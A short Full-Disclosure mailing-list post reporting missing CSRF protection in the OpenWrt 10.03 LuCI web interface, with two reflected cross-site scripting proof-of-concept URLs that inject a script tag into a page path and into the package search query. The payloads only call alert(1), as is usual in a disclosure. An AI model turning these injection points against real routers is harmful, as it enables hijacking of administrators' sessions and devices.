The openwrt 10.03 webinterface seems to have no protection against csrf... In addition, the following xss can be used against the webinterface:
1. (nearly any page) e.g. http://192.168.0.1/cgi-bin/luci/;stok=d/admin/network/network/"/><script>alert(1);</script> 2. the query for packages e.g. http://192.168.0.1/cgi-bin/luci/;stok=d/admin/system/packages?query=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit=OK -- Small things make base men proud. -- William Shakespeare, "Henry VI" _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
